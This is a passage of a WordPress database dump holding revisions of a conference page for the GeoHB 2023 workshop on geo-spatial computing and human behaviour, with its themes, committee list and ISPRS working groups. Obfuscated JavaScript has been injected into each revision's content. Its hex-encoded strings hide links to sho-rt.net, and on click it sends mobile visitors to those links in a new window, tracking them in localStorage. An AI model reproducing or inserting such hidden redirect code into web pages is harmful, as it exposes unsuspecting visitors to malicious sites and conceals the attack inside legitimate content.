Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2022-10-14 17:16:15','2022-10-14 17:16:15','',2791,'https://gsw2023.com/?p=2833',0,'revision','',0),
(2834,1,'2022-10-14 17:17:37','2022-10-14 17:17:37','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]\r\n<h4>Secretary</h4>\r\n[/vc_column_text][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"52\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5><strong>Themes of event:</strong></h5>\r\n<ul>\r\n 	<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\r\n 	<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\r\n 	<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\r\n 	<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\r\n 	<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\r\n 	<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\r\n 	<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\r\n 	<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\r\n 	<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\r\n 	<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\r\n 	<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\r\n 	<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\r\n 	<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\r\n</ul>\r\n<h5><strong>Scientific Committee:</strong></h5>\r\n<ul>\r\n 	<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\r\n 	<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\r\n 	<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\r\n 	<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\r\n 	<li>James Haworth, University College London, UK</li>\r\n 	<li>Tao Jia, Wuhan University, China</li>\r\n 	<li>Xiao Li, University of Oxford, UK</li>\r\n 	<li>Chun Liu, Tongji University, China</li>\r\n 	<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\r\n 	<li>Francesca Noardo, Open Geospatial Consortium</li>\r\n 	<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\r\n 	<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\r\n 	<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\r\n 	<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\r\n 	<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\r\n 	<li>Donggen Wang, The Hong Kong Baptist University, China</li>\r\n 	<li>Martin Werner, Technical University of Munich, Germany</li>\r\n 	<li>René Westerholt, Technical University of Dortmund, Germany</li>\r\n 	<li>Hangbin Wu, Tongji University, China</li>\r\n</ul>\r\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\r\n<ul>\r\n 	<li>WG IV/1: Spatial data representation and interoperability</li>\r\n 	<li>WG IV/3: Geo-computation and geo-simulation</li>\r\n 	<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\r\n</ul>\r\n<h5><strong>Special Issue for the workshop:</strong></h5>\r\nThe authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2022-10-14 17:17:37','2022-10-14 17:17:37','',2791,'https://gsw2023.com/?p=2834',0,'revision','',0),
(2835,1,'2022-10-14 17:24:01','2022-10-14 17:24:01','<!-- wp:paragraph -->\n<p>University of Stuttgart, Germany (WG I/7)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 